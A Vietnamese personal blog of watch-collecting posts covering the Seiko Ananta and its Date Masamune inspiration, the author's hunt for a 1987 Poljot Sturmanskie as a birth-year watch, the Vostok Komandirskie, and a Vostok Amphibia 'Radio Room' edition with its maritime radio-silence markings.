Vào năm 2013, Seiko cho ra đời Seiko Ananta ‘100 năm kỉ niệm’ để đánh dấu mốc 100 năm từ ngày Seiko ra mắt chiếc đồng hồ đeo tay đầu tiên. Và không lấy gì lạ, khi ý tưởng chính của thiết kế chiếc đồng hồ này được truyền từ lịch sử Samurai – giai đoạn đầy hỗn loạn nhưng cũng đầy huy hoàng trong dòng chảy lịch sử của Nhật Bản.

Lịch sử Nhật Bản tới ngày nay ghi lại tên tuổi của rất nhiều Samurai và Lãnh Chúa, mỗi người đều là một truyền thuyết đẹp về kiêu binh của thời loạn. Trong số đó, câu chuyện về Masamune Date nổi bật hơn hẳn. ‘Độc nhãn Long’ Date cầm quân đánh trận đầu tiên vào năm 14 tuổi, trải qua muôn vàn trận chiến và kế thừa danh hiệu Lãnh Chúa từ cha mình vào 3 năm sau, khi ông tròn 17. Hãy không đi quá sâu vào lịch sử, nhưng đội quân của Date luôn gieo rắc nỗi sợ hãi khôn cùng đến cho địch thủ của mình. Trang phục của đội quân đó rất đặc biệt: giáp đen và mũ giáp có hình trăng lưỡi liềm to lớn. Hình ảnh trăng lưỡi liềm vàng lạnh lùng đó cũng là những gì lịch sử nhớ nhất khi nhắc đến Date.

date

Seiko Ananta được truyền cảm hứng từ mảnh trăng đấy.

Trên mặt đồng hồ, từ vị trí số 11 đến số 4, là hình ảnh vầng trăng. Lạ thay, hình lưỡi liềm đó không phá bố cục trên mặt đồng hồ, mà còn tạo thành điểm nhấn cho nó. Seiko Ananta chỉ giới hạn 300 chiếc, và mỗi chiếc mặt kính đều được sơn thủ công bởi Isshu Tamura – một nghệ nhân lão làng trong ngành sơn mài ở Nhật Bản. Và đây cũng là lần đầu tiên, người ta có thể dùng sơn mài để tạo nên màu xanh dương đậm đẹp đến thế. Màu xanh đậm đó tựa như bầu trời đêm đầy huyền bí, và rồi mảnh trăng lưỡi liềm, cũng quét bằng sơn mài màu vàng lạnh từ từ nổi bật lên. Người ta nói, nó gợi lại hình ảnh của một Masamune Date quyền lực đầy kiêu hãnh nhưng cũng bí ẩn ngày nào.

Seiko Ananta dùng máy 8R28 được giới thiệu lần đầu ở Basel World năm 2008 và là máy chronograph tối tân nhất mà Seiko từng chế tạo. Đó cũng nói lên phương châm của Seiko trong ngành công nghiệp đồng hồ: luôn sáng tạo và đổi mới. Hãy không quá đi sâu vào kĩ thuật ở đây, vì nói về nó, ắt phải thêm vài bài dài nữa mới đủ. Nhưng những gì Seiko đã làm gần đây, có lẽ vài chục năm sau, người ta sẽ phải ngoảnh đầu lại và nói lời cám ơn họ vì những bước đột phá táo bạo này.

Nhìn chung, Ananta không phải là con đồng hồ sang trọng nhất của Seiko, nhưng nếu phải chọn một con phác hoạ rõ nét tính cách con người Nhật Bản nhất, tôi sẽ chọn nó. Dù là giữa ánh sáng chói chang ban ngày, hay vào buổi đêm đen mịt, vầng trăng lưỡi liềm đó vẫn sẽ luôn gợi lên cho tôi hình ảnh về những thứ làm nên con người Nhật Bản: tinh thần và niềm kiêu hãnh của một Samurai…

Birth year watch – và quá trình tìm kiếm gian nan

Có những người thích sưu tập đồng hồ theo một chủ đề nào đó, hoặc là chẳng có chủ đề gì sất. Đại loại, có người chỉ thích diving watch, có người thích minimalist watch, có người thích đồng hồ Đức, người mê đồng hồ Liên Xô… Nhưng dù gì đi nữa, thì hầu hết đều ít nhất tìm cho mình một con Birth year watch để bổ sung vào bộ sưu tập. Vậy birth year watch là gì? Tại sao hầu như ai cũng muốn tìm cho mình một con như thế?

Birth year watch đơn giản là đồng hồ được ra đời cùng năm với mình. Cảm giác khi đeo một con Birth year watch thích lắm, nhất là lại là thứ có liên quan đến thời gian. Nhiều lúc đeo nhìn vào và bất giác thấy vui và tự nhủ: “này, bọn mình bằng tuổi đấy. Mày có trải qua những mốc thời gian như tao không? Vào năm mày 14, 17, 19… tuổi, trong khi tao bắt đầu biết xao động yêu đương, biết buồn vui thương nhớ, thì mày làm gì? Mày đang ở trên tay ai?”.

Nói thì hơi sến, nhưng Birth year watch nhiều khi mang lại cảm giác đặc biệt thế đó. Như có nhân chứng thời gian cùng với mình 🙂

Và, hãy để mình kể về quá trình tìm Birth year watch của mình: con đồng hồ ra đời năm 1987.

I. Các lựa chọn

1. Đầu tiên là Swatch, đơn giản là vì bọn này… mỗi năm đều ra một loại. Nghĩa là loại năm 85, 86 chả khác gì năm 87, 90… chỉ là mang một con số khác nhau. Vậy nên khi mình đấu giá hụt con Watch rất đặc biệt chỉ sản xuất mỗi dịp Giáng Sinh 1987 (trên mặt có hình bông tuyết), thì tức khắc mình bỏ qua lựa chọn này.

swatch

2. Seiko 6309-729A, loại này của Seiko được sản xuất trong khoảng từ 1984 – 1988. Con này giá cả phải chăng, nhìn cũng được. Seiko có số seri nên thường rất dễ nhận ra ngay nó được sản xuất năm nào.

seiko

3. Rolex Oyster Perpetual. Ờ con này giá $7000. Bảy ngàn đô. Thế nên khỏi nói nhiều. Mà thật ra mình cũng không mê Rolex lắm.

rolex

4. Omega Speedmaster DayDate 1987. Con này giá dao động từ $2,500 – $3,500. Nếu mà mình giàu giàu giàu chắc tầm chục năm nữa mình sẽ mua huhuhu. Con này nhìn đẹp quá.

omega

II. Đồng hồ Liên Xô?

Well, dĩ nhiên với một đứa thích mê đồng hồ Liên Xô như mình, thì tìm được một con Birth year watch sản xuất năm 1987 tại Liên Xô ắt là số dzách. Tuy nhiên, khó, khó lắm. Chi tiết đầu tiên khả dĩ có thể nghĩ đến là vào năm 1987, để kỉ niệm 70 năm ngày Cách Mạng Tháng Mười Liên Xô (Tháng Mười Đỏ), Vostok có cho ra mắt con đồng hồ Amphibia đặc biệt.

vostok

Mình đi tìm con này khắp mấy tuần trên Net, nhiều lúc đăng kí các forum để pm thành viên có con đồng hồ này để hỏi xem họ có bán lại không, rất tiếc là không được may mắn.

Kế đó, mình chuyển hướng sang dòng Poljot Sturmanskie huyền thoại của Xô Viết xem có cách tìm được con nào sản xuất năm 1987 không, vì dòng này mỗi thời kì có một kiểu rõ ràng dễ phân biệt (màu mặt đồng hồ, chữ, font…). Tuy nhiên, những tay chơi rành đồng hồ Liên Xô nhất cũng không tay nào có thể biết chính xác con Poljot Sturmanskie nào chính xác ra đời vào năm nào (chỉ biết trong khoảng thời gian xê dịch 4, 5 năm). Tưởng hi vọng vụt tắt thì tình cờ một ngày mình được đọc blog của một tay Hà Lan cũng sưu tập đồng hồ. Thấy ngay một con Poljot Sturmanskie mà ở máy có ghi rõ ngày sản xuất 87 – con hiếm hoi và duy nhất mà mình thấy có ghi như thế.

Mình gửi email cho tay này, rất may sau một hồi nói chuyện, hắn đồng ý nhượng lại cho mình. Vấn đề tiếp theo là tiền ship từ Hà Lan qua Mỹ quá mắc, và qua Mỹ sẽ dính thuế hải quan 15-20% nữa. May sao mình đang phân vân thì tay ấy bảo: “tầm 3 tuần nữa tao qua Mỹ đọc diễn văn ở trường đại học bên đó” (vãi cmn hoành tráng), tin thì đợi tao qua tới Mỹ tao ra Fedex chuyển cho. Nói chung email qua lại trao đổi các vấn đề về đồng hồ Liên Xô với tay này tầm 15, 20 email rồi, nên mình cũng khá yên tâm. Thật ra tính mình cũng hay tin người, nhưng may là mình không bị lừa lần này.

Hôm nay đi làm về, thấy gói Fedex được đặt trước cửa, không kiềm được sung sướng, chưa kịp thay đồ rửa mặt, mình lôi ra ngắm nghía ngay. Trong email tay Hà Lan có bảo, tao cho mày cái hộp đặc biệt đẹp, vì đây là birth year watch của mày. Quả đúng thế. Và không những chỉ có hộp, đồng hồ cũng đẹp bất ngờ. Share đây vài tấm hình

3133-1

3133-2

3133-3

3133-4

Các bạn vào chúc mừng mình đi 🙂

—-

Thông tin thêm về con Poljot của mình. Poljot Sturmanskie là loại đồng hồ đặc biệt được sản xuất riêng cho phi công, quân đội và các nhà du hành vũ trụ của Liên Xô, không bán cho dân thường. Tuy nhiên, sau này khi Liên Xô tan rã, các quân nhân ngày nào bắt đầu đem bán Poljot Sturmanskie ra ngoài, vì vậy trên thị trường mà để ý tìm vẫn có.

À, hiện mình và tay Hà Lan vẫn nói chuyện đều. Tay ấy vừa khoe mình đọc diễn văn diễn thuyết gì rất thành công. Hắn hỏi mình nhiều thứ về cuộc sống bên Mỹ, thắc mắc những câu rất buồn cười như sao bên bọn mày nhà cửa san sát thế (bố khỉ, anh tới New York thì nhà cửa nó thế đúng rồi), sao bọn mày khoái ăn chip thế… và bàn về thú chơi đồng hồ Liên Xô khá nhiều. Nói chung đây là một tay thú vị. Rất vui khi quen được một người thế.

Vostok Komandirskie

Với $30 bạn có thể mua được đồng hồ gì? Tôi tin rằng nếu nêu câu hỏi này ra thì hết 9 trong 10 người được hỏi sẽ lắc đầu ngao ngán mà bảo rằng: hàng Tàu hay hàng kém chất lượng. Thật ra, $30 đủ để mua một con Casio ‘truyền-thống’ (tôi gọi thế vì thời của tôi hầu như đứa nào cũng xài http://www.casio-usa.com/products/Watches/Classic/W215H-1AV/), hay một con Timex Weekender (cứ dăm ba tháng Amazon lại sale xuống dưới $30). Mấy con đó cũng khá đấy, không thường đâu, nhưng nếu tôi nói bạn rằng:

$30 đủ để bạn mua một trong những con đồng hồ Liên Xô chất lượng nhất (dĩ nhiên tương ứng với giá tiền) thì bạn có tin không?

Nếu bạn tin, thì Vostok Komandirskie là câu trả lời cho bạn.

—-

Trong ngành đồng hồ, khái niệm in-house movement (máy tự phát triển) được đánh giá rất cao. Thật ra, đây cũng là khái niệm tương đối. Ngành công nghiệp đồng hồ phát triển nhanh đến mức hiện giờ những movement rẻ bèo cũng có thể cho độ chính xác cao ở mức chấp nhận được. Tuy nhiên, với nhiều người, movement được xem là linh hồn của một chiếc đồng hồ, họ rất coi trọng chuyện movement đó có lịch sử thế nào, xài hàng của nước khác, hay tự phát triển, hay mua bản thiết kế về rồi tự thay đổi và hiệu chỉnh. Với họ, một con đồng hồ xài in-house movement tuy chất lượng cũng không hơn gì so với loại khác, nhưng yếu tố tinh thần trong đó đáng giá hơn nhiều.

Vostok Komandirskie là như thế.

—-

Bị cái bóng quá lớn của người anh Vostok Amphibia che lấp, Komandirskie không được biết đến nhiều, nếu bạn không phải là người thật sự tìm hiểu về đồng hồ Liên Xô. Thiết kế của Komandirskie cũng không mang vẻ cứng cáp nhìn rất ‘ổn’ như ông anh, trái lại, để giảm giá thành sản phẩm, các kĩ sư của Vostok đã hạn chế tối đa những nguyên liệu đắt tiền. Điều này dẫn đến giá thành của một Komandirskie thường dao động từ $30 tới $50. Thỉnh thoảng nếu may mắn có thể tìm được con chỉ 10 đồng bạc Mỹ, và cũng có khi lên tới vài trăm nếu con đồng hồ đó hiếm.

Tuy nhiên, rẻ như thế không đồng nghĩa với chất lượng kém như mọi người nghĩ. Vostok Komandirskie là đồng hồ được đích thân Bộ Quốc Phòng Liên Xô đặt hàng. Nó phải vừa đủ rẻ để sản xuất số lượng lớn, chất lượng lại phải đạt tới một mức nào đó chấp nhận được. Trong thời hoàng kim của mình, Vostok làm tới phải gần 100 mẫu Komandirskie khác nhau. Ngoại trừ máy (thường là 2414A) giống nhau, mẫu thiết kế của Komandirskie thay đổi nhiều, từ hình in trên bề mặt tới kết cấu chung của đồng hồ.

Giá thành rẻ, nhiều mẫu mã, cùng việc nó thường gắn liền với đội quân, binh đoàn hay sự kiện nào đó của lịch sử, khiến Komandirskie được nhiều người sưu tầm. Trên các forum đồng hồ Xô Nga, dăm đôi ba bữa lại có một anh khoe kiểu: tao mới vớt được em Komandirskie này, sản xuất riêng cho lính tank sa mạc đấy nhé…

Lại nói về forum, rất nhiều anh mới vào cứ thắc mắc: liệu Komandirskie xài được không vì họ e ngại giá quá rẻ. Một lần như thế, tôi nghe có tay trả lời: tao có gần 50 con Komandirskie trong bộ sưu tập, và chưa con nào bị sao cả. Quá ấn tượng phải không? Vì những câu trả lời như thế, tôi quyết định tìm mua cho mình một con Komandirskie.

—-

Con Komandirskie của tôi mua giá mắc hơn so với những con thường thấy trên eBay. Thật ra ban đầu cũng định mua con rẻ, nhưng tình cờ thấy được con này thích luôn. Lại nói thêm, thiết kế ban đầu khi Vostok thiết kế cho Bộ Quốc Phòng là có nút vặn ở vị trí 2 giờ, sau là 4 giờ. Vì vậy, cùng là Vostok Komandirskie, con có nút vặn ở vị trì 2 giờ sẽ mắc hơn con ở vị trí 4 giờ, và mắc hơn ở vị trí 3 giờ thường thấy.

Con này mặt nhìn đẹp, lại có nút vặn ở vị trí 2 giờ, vì vậy không suy nghĩ gì nhiều, tôi quyết định mua luôn. Nhìn chung, tôi ít đeo con này hơn so với Vostok Amphibia hay các con đồng hồ khác, có nó như là một hình thức mang ý nghĩa sưu tập. Đơn giản là cần phải có, thế thôi.

Vostok Amphibia SE – Radio Room

Không phải khó hiểu khi trong các dòng đồng hồ thì Diving Watch (đồng hồ lặn) là thứ được đàn ông để ý và yêu thích nhất. Nó có gì đó mạnh mẽ và đầy nam tính, chính xác và khoẻ mạnh. Cũng như bao gã đàn ông khác đã làm một khi say mê đồng hồ, tôi quyết định chọn tìm mua cho mình một con đồng hồ lặn. Và con (đồng hồ lặn) đầu tiên của tôi, surprise?, đến từ Liên Xô.

Như đã giới thiệu qua ở note này http://xanhduong.com/2014/02/ke-choi-ve-dong-ho-lan-va-niem-tu-hao-vostok-amphibia-cua-nguoi-xo-viet/ (dù dài thế chắc chả ai có thời gian đọc aint nobody got time fo dat?), Vostok Amphibia là thứ tôi nhắm đến.

Vostok Amphibia có rất, rất, rất, và thêm một lần rất nữa để nhấn mạnh, rất nhiều kiểu, đủ hình dáng case và mặt dial khác nhau. Tôi đã phải xem qua ít nhất là vài chục mẫu khác nhau trước khi quyết định lấy cho mình Vostok Amphibia phiên bản đặc biệt chỉ sản xuất 50 cái. Từ ‘lấy’ nghe rất đơn giản, nhưng Vostok Amphibia dạo gần đây chả hiểu sao nổi lên cực kì trong các tay mê, hay chỉ là thích một con đồng hồ Xô Nga, vì vậy Vostok Amphibia SE luôn ở tình trạng cháy hàng. Tính ra từ ngày quyết định mua tới ngày tôi ‘được’ nhấn vào nút Mua là phải gần tháng rưỡi. Tháng rưỡi đó là những ngày đợi chờ, ngày ngày vào website hay Facebook page của chỗ bán đồng hồ đó rình mò.

Con tôi mua là phiên bản đặc biệt nên phải mắc gấp đôi so với các con bình thường khác (Na Na đừng giận…), đi kèm dây NATO màu đen to. Mặt đồng hồ hình tròn nhưng đặt trên lớp vỏ hình chữ nhật chắc chắn. Lớp vòng ngoài đồng hồ xoay được có các chấm đỏ và trắng, để đánh dấu thời gian lặn trung bình. Khi bắt đầu lặn, người thợ lặn sẽ xoay vòng tròn đó tới vị trí hiện tại, và khi xuống nước, chỉ cần nhìn khi nào kim phút chỉ tới chấm trắng là biết được thời gian lặn sắp hết (tại sao là 20 phút thì đến giờ vẫn chưa có lời giải đáp cụ thể, có người nói là do công nghệ lặn vào thời điểm đó chỉ hỗ trợ tối đa 20 phút?). Số và kim đồng hồ được nhuộm dạ quang để có thể phát sáng ở nơi vùng nước đen thăm thẳm.

Lại nói thêm, phiên bản tôi mua có tên là Radio Room. Radio Room là gì? Hãy thử kể về câu chuyện vụ đắm tàu nổi tiếng nhất trong lịch sử: Titanic. Người ta bảo một trong những nguyên nhân chính khiến việc cứu hộ không kịp thời là do quá hoảng loạn nên các tín hiệu radio giữa tàu Titanic và các tàu khác bị nghẽn (nghĩ đơn giản là một lúc có quá nhiều tín hiệu phát đi/ nhận về giữa Titanic và các tàu khác nên không cái nào tới được). À ừ ai từng xem Titanic của James Cameron chắc nhớ cảnh này.

Sau tai nạn đó, các nước trên thế giới đã đồng ý đi đến một hiệp định chung về cách truyền/ gửi tín hiệu trên các tàu. Theo đó, trong 1 giờ, sẽ có 4 thời điểm không ai được truyền BẤT CỨ tín hiệu radio nào (ngoài tín hiệu SOS). Như 2 vị trí màu hồng nhạt (giữa 12 và 1, giữa 6 và 7) trên đồng hồ của tôi là chỉ các tàu phải im lặng để nghe tín hiệu kêu cứu bằng tiếng nói ở tần số 2182 kHz, và 2 vị trí màu đỏ nhạt (giữa 3 và 4, giữa 9 và 10) là chỉ các tàu phải im lặng để nghe tín hiệu kêu cứu bằng morse code. Mỗi dải màu dài 3 phút. Thử giả sử Titanic xảy ra sau khi quy ước này được ban hành, thì tất cả các tàu xung quanh vào 12 giờ đến 12h giờ 3’ sẽ nghe tín hiệu cầu cứu bằng lời nói của Titanic, từ 12 giờ 15′ đến 12 giờ 18′ sẽ nghe tín hiệu cầu cứu bằng mã morse của Titanic. Và như thế biết đâu tất cả mọi người trên tàu sẽ được cứu, biết đâu Jack không phải chết vì Rose mà chết vì khi cập bến bị chồng Rose bắn (ặc).

Vostok Amphibia được quân đội Liên Xô sử dụng nhiều, vì vậy họ đặc biệt làm phiên bản này cho những kĩ thuật viên radio trên tàu. Dĩ nhiên tôi không nghĩ có ngày tôi phải dùng-đến-kiến-thức này, nhưng vì câu chuyện thú vị nên khi chọn Vostok Amphibia, tôi quyết định chọn Vostok Amphibia radio room này.

Chờ 3 tuần để đồng hồ ship từ Nga, khi nó về tôi thay ngay dây NATO 3 màu xanh trắng đỏ, và hiện tại, Vostok Amphibia này là con đồng hồ đeo thường xuyên của tôi, vì nó rất cool.

© 2024 B.l.u.e. All rights reserved.

Theme by Anders Norén.